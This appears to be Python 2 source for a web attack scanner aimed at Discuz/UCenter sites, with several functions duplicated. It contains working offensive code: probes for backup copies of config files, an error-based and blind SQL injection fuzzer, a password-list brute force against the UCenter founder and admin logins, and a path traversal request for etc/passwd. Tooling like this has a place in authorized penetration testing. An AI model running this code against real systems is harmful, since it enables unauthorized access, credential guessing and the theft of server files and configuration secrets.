def GetVersion(self, target):
result = self.Scanner.GetData(target + 'robots.txt', regstr='*')
VERSION = re.findall(
'(X2)|(X2.5)|(X3.1)|(X3.2)|(X3)|(7.0.0)|(7.2)|(6.0.0)',
str(result[2]))
colprint.strprint(10, 'VERSION is ')
colprint.strprint(10, VERSION)
def GetVersion(self,target):
result=self.Scanner.GetData(target+'robots.txt',regstr='*')
VERSION=re.findall('(X2)|(X2.5)|(X3.1)|(X3.2)|(X3)|(7.0.0)|(7.2)|(6.0.0)',result[2])
if VERSION:
for x in VERSION[0]:
if x:
colprint.strprint(10,'VERSION is '+x)
else:
print 'VERSION not found'
def GetBak(self, target):
for i in range(1, 11):
url = target + '?' + str(i)
result = self.Scanner.GetData(url,
regstr='uid=' + str(i) +
'">(\S+)</a>')
print result
BAKLIST = [
'%23', '.bak', '_bak', '.swp', '.orig', '.txt', '.old', '%7e',
'.inc', '_inc'
]
for BakExt in BAKLIST:
result = self.Scanner.GetData(target +
'config/config_ucenter.php' + BakExt,
regstr='<\?php')
if result[1] == 200:
colprint.strprint(10, 'Something is Found')
result = self.Scanner.GetData(target + 'config/config_global.php' +
BakExt,
regstr='<\?php')
if result[1] == 200:
colprint.strprint(10, 'Something is Found')
result = self.Scanner.GetData(target + 'data/config.inc.php' +
BakExt,
regstr='<\?php')
if result[1] == 200:
colprint.strprint(10, 'Something is Found')
def GetBak(self,target):
for i in range(1,11):
url=target+'?'+str(i)
result=self.Scanner.GetData(url,regstr='uid='+str(i)+'">(\S+)</a>')
print result
BAKLIST=['%23','.bak','_bak','.swp','.orig','.txt','.old','%7e','.inc','_inc']
for BakExt in BAKLIST:
result=self.Scanner.GetData(target+'config/config_ucenter.php'+BakExt,regstr='<\?php')
print result[1],target+'config/config_ucenter.php'+BakExt
if result[1]==200:
colprint.strprint(10,'Something is Found')
result=self.Scanner.GetData(target+'config/config_global.php'+BakExt,regstr='<\?php')
print result[1],target+'config/config_global.php'+BakExt
if result[1]==200:
colprint.strprint(10,'Something is Found')
result=self.Scanner.GetData(target+'data/config.inc.php'+BakExt,regstr='<\?php')
print result[1],target+'data/config.inc.php'+BakExt
if result[1]==200:
colprint.strprint(10,'Something is Found')
def ScanSql(self,url, data=None):
is_vul, usable = False, False
url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
try:
for phase in (self.GET, self.POST):
original, current = None, url if phase is self.GET else (data or "")
for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
vulnerable, usable = False, True
print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(self.TAMPER_SQL_CHAR_POOL, len(self.TAMPER_SQL_CHAR_POOL))))))
content = self._retrieve_content(tampered, data) if phase is self.GET else self._retrieve_content(url, tampered)
for (dbms, regex) in ((dbms, regex) for dbms in self.DBMS_ERRORS for regex in self.DBMS_ERRORS[dbms]):
if not vulnerable and re.search(regex, content[self.HTML], re.I):
colprint.strprint(4, " (i) %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms))
is_vul = vulnerable = True
vulnerable = False
original = original or (self._retrieve_content(current, data) if phase is self.GET else self._retrieve_content(url, current))
randint = random.randint(1, 255)
for prefix, boolean, suffix in itertools.product(self.PREFIXES, self.BOOLEAN_TESTS, self.SUFFIXES):
if not vulnerable:
template = "%s%s%s" % (prefix, boolean, suffix)
payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (randint + 1 if _ else randint, randint), safe='%')))) for _ in (True, False))
contents = dict((_, self._retrieve_content(payloads[_], data) if phase is self.GET else self._retrieve_content(url, payloads[_])) for _ in (False, True))
if all(_[self.HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (self.HTTPCODE, self.TITLE))):
vulnerable = True
else:
ratios = dict((_, difflib.SequenceMatcher(None, original[self.TEXT], contents[_][self.TEXT]).quick_ratio()) for _ in (True, False))
vulnerable = all(ratios.values()) and ratios[True] > self.FUZZY_THRESHOLD and ratios[False] < self.FUZZY_THRESHOLD
if vulnerable:
colprint.strprint(4," (i) %s parameter '%s' appears to be blind SQLi vulnerable" % (phase, match.group("parameter")))
is_vul = True
if not usable:
colprint.strprint(2, " (x) no usable GET/POST parameters found")
except KeyboardInterrupt:
print "\r (x) Ctrl-C pressed"
return is_vul
def ScanSql(self,url, data=None):
is_vul, usable = False, False
url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
try:
for phase in (self.GET, self.POST):
original, current = None, url if phase is self.GET else (data or "")
for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
vulnerable, usable = False, True
print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(self.TAMPER_SQL_CHAR_POOL, len(self.TAMPER_SQL_CHAR_POOL))))))
content = self._retrieve_content(tampered, data) if phase is self.GET else self._retrieve_content(url, tampered)
for (dbms, regex) in ((dbms, regex) for dbms in self.DBMS_ERRORS for regex in self.DBMS_ERRORS[dbms]):
if not vulnerable and re.search(regex, content[self.HTML], re.I):
colprint.strprint(4, " (i) %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms))
is_vul = vulnerable = True
vulnerable = False
original = original or (self._retrieve_content(current, data) if phase is self.GET else self._retrieve_content(url, current))
randint = random.randint(1, 255)
for prefix, boolean, suffix in itertools.product(self.PREFIXES, self.BOOLEAN_TESTS, self.SUFFIXES):
if not vulnerable:
template = "%s%s%s" % (prefix, boolean, suffix)
payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (randint + 1 if _ else randint, randint), safe='%')))) for _ in (True, False))
contents = dict((_, self._retrieve_content(payloads[_], data) if phase is self.GET else self._retrieve_content(url, payloads[_])) for _ in (False, True))
if all(_[self.HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (self.HTTPCODE, self.TITLE))):
vulnerable = True
else:
ratios = dict((_, difflib.SequenceMatcher(None, original[self.TEXT], contents[_][self.TEXT]).quick_ratio()) for _ in (True, False))
vulnerable = all(ratios.values()) and ratios[True] > self.FUZZY_THRESHOLD and ratios[False] < self.FUZZY_THRESHOLD
if vulnerable:
colprint.strprint(4," (i) %s parameter '%s' appears to be blind SQLi vulnerable" % (phase, match.group("parameter")))
is_vul = True
if not usable:
colprint.strprint(2, " (x) no usable GET/POST parameters found")
except KeyboardInterrupt:
print "\r (x) Ctrl-C pressed"
return is_vul
def PwdList(self,target):
result=self.Scanner.GetData(target+'uc_server/admin.php?m=user&a=login')
if result[1]!=200:
colprint.strprint(12,'UC_SERVER is not usable!')
return None
else:
colprint.strprint(10,'UC_SERVER is usable.')
result=self.Scanner.GetData(target+'develop.php')
if result[1]==200:
colprint.strprint(10,'develop is usable!')
result=self.Scanner.GetData(target+'utility')
if result[1]==200:
colprint.strprint(10,'utility path is found.')
with open('password.txt','r') as pwdlist:
for line in pwdlist:
password=line.strip()
result=self.GetFounderPwd(target,password)
print 'UC_SERVER Founder ',password
if re.findall('(sid=)',result[0]):
colprint.strprint(10,'Passwd is Found '+password)
result=self.GetPwd(target,password)
print 'admin ',password
if re.findall('(sid=)',result[0]):
colprint.strprint(10,'Passwd is Found '+password)
def serverbanner(self,target):
result=self.Scanner.GetData(target,'OPTIONS')#OPTIONS is Enable
if result[1]==200 and (result[2].get('allow',1))!=1:
colprint.strprint(2,'\nOPTIONS is Enable: '+result[2]['allow'])
PutEnable=re.search('PUT',result[2]['allow'])
if PutEnable:
colprint.strprint(4,'PUT Method is Enable!')
result=self.Scanner.GetData(target)# Server Banner
print result
if result[1]==200 and (result[2].get('server',1))!=1:
colprint.strprint(2,'Server:'+result[2]['server'])
if result[1]==200 and (result[2].get('x-powered-by',1))!=1:
colprint.strprint(2,'x-powered-by:'+result[2]['x-powered-by'])
result=self.Scanner.GetData(target+'robots.txt',regstr='*')#Server robots.txt
if result[1]==200:
colprint.strprint(2,'robots.txt')
colprint.strprint(2,result[2])
_line='..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
url=target+_line
result=self.Scanner.GetData(url,regstr='*')
print result[2]